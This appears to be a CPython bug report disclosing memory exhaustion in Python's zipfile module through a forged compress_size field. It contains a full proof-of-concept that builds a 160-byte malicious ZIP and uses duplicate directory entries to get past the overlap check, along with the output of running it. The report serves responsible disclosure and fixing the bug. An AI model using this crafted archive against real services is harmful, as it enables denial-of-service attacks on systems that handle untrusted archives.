Memory Exhaustion in zipfile via Forged compress_size #151307

@DarkaMaul

Bug report

Bug description:

Summary

A 160-byte crafted ZIP file forces Python's zipfile module to attempt a single heap allocation of about 1 GiB (3.14) or about 2 GiB (3.15).

Details

ZipExtFile._read2() passes a user-controlled compress_size from the central directory to self._fileobj.read(n). On 3.14 builds, ZipExtFile.MAX_N caps a single request at 1 GiB. On 3.15, the cap was corrected to (1 << 31) - 1, about 2 GiB. A 160-byte crafted ZIP claiming compress_size=0xFFFFFFFE therefore triggers an allocation attempt of about 1 GiB (3.14) or about 2 GiB (3.15).
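The request sizes quoted above can be reproduced with a little arithmetic. This is only a sketch: it assumes the size passed to read() is the smaller of the cap and the number of compressed bytes the entry claims to have left, and `first_read_request` is a hypothetical helper, not a zipfile function.

```python
GIB = 1 << 30

CLAIMED_SIZE = 0xFFFF_FFFE   # forged compress_size used by the reproducer
CAP_3_14 = 1 << 30           # 1 GiB cap, as stated above for 3.14
CAP_3_15 = (1 << 31) - 1     # corrected cap on 3.15


def first_read_request(compress_left: int, cap: int) -> int:
    """Assumed clamp: request at most `cap` bytes, and at most what is claimed to remain."""
    return min(cap, compress_left)


for label, cap in (("3.14", CAP_3_14), ("3.15", CAP_3_15)):
    n = first_read_request(CLAIMED_SIZE, cap)
    print(f"{label}: read({n:,}) is {n / GIB:.2f} GiB")
```

Because the forged size exceeds both caps, the cap alone decides how much is requested; the real size of the member (1 byte) never enters the calculation.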
Note: The overlap check is bypassed by using two CD entries with the same filename and header_offset=0. The first entry (the one with forged sizes) gets _end_offset == header_offset, which triggers only a warning instead of an error.
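The bypass described in the note can be illustrated with a simplified model. This is not CPython's code: `Entry`, `assign_end_offsets` and `check` are hypothetical names, and the model assumes that entries are sorted by header_offset (ties keeping central-directory order), walked in reverse, and that each entry ends where the next one starts.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Entry:
    label: str
    header_offset: int
    compress_size: int
    end_offset: Optional[int] = None


def assign_end_offsets(entries, start_dir):
    """Walk entries from highest to lowest offset; each one ends where the next begins."""
    end_offset = start_dir
    for entry in reversed(sorted(entries, key=lambda e: e.header_offset)):
        entry.end_offset = end_offset
        end_offset = entry.header_offset


def check(entry, data_start):
    """Classify an entry: 'ok', 'warn' (overlap tolerated) or 'reject'."""
    if data_start + entry.compress_size <= entry.end_offset:
        return "ok"
    if entry.end_offset == entry.header_offset:
        return "warn"
    return "reject"


# Values from the reproducer: both entries point at offset 0, the central
# directory starts at byte 36, and the member data starts at byte 35.
forged = Entry("forged", header_offset=0, compress_size=0xFFFF_FFFE)
normal = Entry("normal", header_offset=0, compress_size=1)
assign_end_offsets([forged, normal], start_dir=36)

results = {e.label: check(e, data_start=35) for e in (forged, normal)}
print(results)
```

In this model the forged entry is listed first, so it is visited last in the reverse walk and inherits the second entry's header_offset (0) as its end offset. That lands it in the "warn" branch rather than the "reject" branch.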

Reproducer

"""
Memory exhaustion in zipfile via crafted compress_size field.
"""

import resource
import struct
import sys
import tempfile
import zipfile


CLAIMED_SIZE = 0xFFFF_FFFE
MEM_LIMIT = 256 * 1024 * 1024  # 256 MiB


def craft_malicious_zip(claimed_compress_size: int) -> bytes:
    """
    Build a minimal ZIP with one local file and two CD entries for it:
    the first carries the forged sizes, the second the real ones.
    """
    filename = b"a.txt"
    file_data = b"x"
    real_size = len(file_data)

    local_header = struct.pack(
        "<4s2B4HL2L2H",
        b"PK\x03\x04",
        20, 0, 0, 0, 0, 0, 0,
        real_size, real_size,
        len(filename), 0,
    )

    cd_offset = len(local_header) + len(filename) + len(file_data)

    cd_entry_forged = struct.pack(
        "<4s4B4HL2L5H2L",
        b"PK\x01\x02",
        20, 0, 20, 0,
        0, 0, 0, 0, 0,
        claimed_compress_size,
        claimed_compress_size,
        len(filename),
        0, 0, 0, 0, 0,
        0,
    )

    cd_entry_normal = struct.pack(
        "<4s4B4HL2L5H2L",
        b"PK\x01\x02",
        20, 0, 20, 0,
        0, 0, 0, 0, 0,
        real_size,
        real_size,
        len(filename),
        0, 0, 0, 0, 0,
        0,
    )

    real_cd_size = (
        len(cd_entry_forged) + len(filename)
        + len(cd_entry_normal) + len(filename)
    )

    eocd = struct.pack(
        "<4s4H2LH",
        b"PK\x05\x06",
        0, 0, 2, 2,
        real_cd_size, cd_offset, 0,
    )

    return (
        local_header + filename + file_data
        + cd_entry_forged + filename
        + cd_entry_normal + filename
        + eocd
    )


def main():
    malicious_zip = craft_malicious_zip(CLAIMED_SIZE)

    with tempfile.NamedTemporaryFile(suffix=".zip") as tmp:
        tmp.write(malicious_zip)
        tmp.flush()

        try:
            with zipfile.ZipFile(tmp.name, "r") as zf:
                forged = zf.filelist[0]
                with zf.open(forged) as f:
                    f.read()
        except MemoryError:
            print(
                f"MemoryError from {len(malicious_zip)}-byte ZIP "
                f"with compress_size={CLAIMED_SIZE:,}"
            )
            sys.exit(0)
        except Exception:
            print("BLOCKED: zipfile rejected forged compress_size")
            sys.exit(1)

    print("BLOCKED: no allocation error raised")
    sys.exit(1)


if __name__ == "__main__":
    resource.setrlimit(resource.RLIMIT_AS, (MEM_LIMIT, MEM_LIMIT))
    main()

Because of how RLIMIT_AS works, it is better to run the PoC in a container.

❯ docker run --rm -v "$(pwd)":/work -w /work python:3.14-slim python poc.py
/work/poc.py:92: UserWarning: Overlapped entries: 'a.txt' (possible zip bomb)
  with zf.open(forged) as f:
MemoryError from 160-byte ZIP with compress_size=4,294,967,294
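The 160-byte figure in the output can be checked from the struct formats used in the reproducer. The sketch below only adds up record sizes; the variable names are illustrative.

```python
import struct

# Format strings copied from the reproducer.
LOCAL_HEADER_FMT = "<4s2B4HL2L2H"
CD_ENTRY_FMT = "<4s4B4HL2L5H2L"
EOCD_FMT = "<4s4H2LH"

filename_len = len(b"a.txt")
data_len = len(b"x")

# Local header + filename + 1 byte of file data.
local_part = struct.calcsize(LOCAL_HEADER_FMT) + filename_len + data_len
# Two central directory entries, each followed by the filename.
cd_part = 2 * (struct.calcsize(CD_ENTRY_FMT) + filename_len)
# End of central directory record with an empty comment.
eocd_part = struct.calcsize(EOCD_FMT)

total = local_part + cd_part + eocd_part
print(local_part, cd_part, eocd_part, total)
```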

Impact

Memory Exhaustion
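Callers that process untrusted archives could screen entries before reading them. The following is a minimal sketch of one coarse check, not a fix for the module: `oversized_members` is a hypothetical helper, and it only flags entries whose claimed compress_size is larger than the whole archive.

```python
import io
import zipfile


def oversized_members(zf: zipfile.ZipFile, archive_size: int) -> list[str]:
    """Return names of entries claiming more compressed bytes than the archive holds."""
    return [
        info.filename
        for info in zf.infolist()
        if info.compress_size > archive_size
    ]


# Build a small, well-formed archive in memory for demonstration.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("a.txt", "x")
archive_size = len(buf.getvalue())

with zipfile.ZipFile(buf) as zf:
    print(oversized_members(zf, archive_size))
    # Simulate a forged central directory field on the parsed entry.
    zf.filelist[0].compress_size = 0xFFFF_FFFE
    print(oversized_members(zf, archive_size))
```

For an archive on disk, `archive_size` could come from `os.path.getsize()`. The check does not catch forged sizes that stay below the archive size, so it limits the worst case rather than validating each entry.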

Linked issues

#141713

/cc @serhiy-storchaka

CPython versions tested on:

3.15

Operating systems tested on:

macOS, Linux

Labels

type-bug: An unexpected behavior, bug, or error
